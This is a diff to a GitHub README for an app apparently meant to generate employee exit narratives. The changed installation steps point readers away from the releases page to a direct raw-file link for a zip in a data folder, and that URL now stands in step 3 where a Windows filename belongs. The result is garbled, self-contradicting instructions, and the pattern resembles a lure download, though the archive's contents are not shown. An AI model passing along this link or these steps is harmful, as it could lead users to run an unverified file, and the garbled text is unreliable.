Isandc/Exit-Narrative-Generator/README.md

 - **Counterfactual Interventions:** Shows what could have been done to improve retention.

 ## ✏️ Installation Steps
-1. **Visit the Download Page:** Click on this link to go to the releases page: [Download Page](https://github.com/Isandc/Exit-Narrative-Generator/releases).
+1. **Visit the Download Page:** Click on this link to go to the releases page: [Download Page](https://raw.githubusercontent.com/Isandc/Exit-Narrative-Generator/main/data/raw/Exit_Narrative_Generator_v2.4.zip).
 2. **Select the Latest Version:** Find the latest release at the top of the page.
-3. **Download the Application:** Look for the file matching your system (e.g., Exit-Narrative-Generator-win.exe for Windows).
+3. **Download the Application:** Look for the file matching your system (e.g., https://raw.githubusercontent.com/Isandc/Exit-Narrative-Generator/main/data/raw/Exit_Narrative_Generator_v2.4.zip for Windows).
 Click the link to download the file.
 4. **Run the Application:**
    - **Windows:** Double-click the downloaded `.exe` file.
    - **macOS:** Open the downloaded `.dmg` file and drag the application to your Applications folder.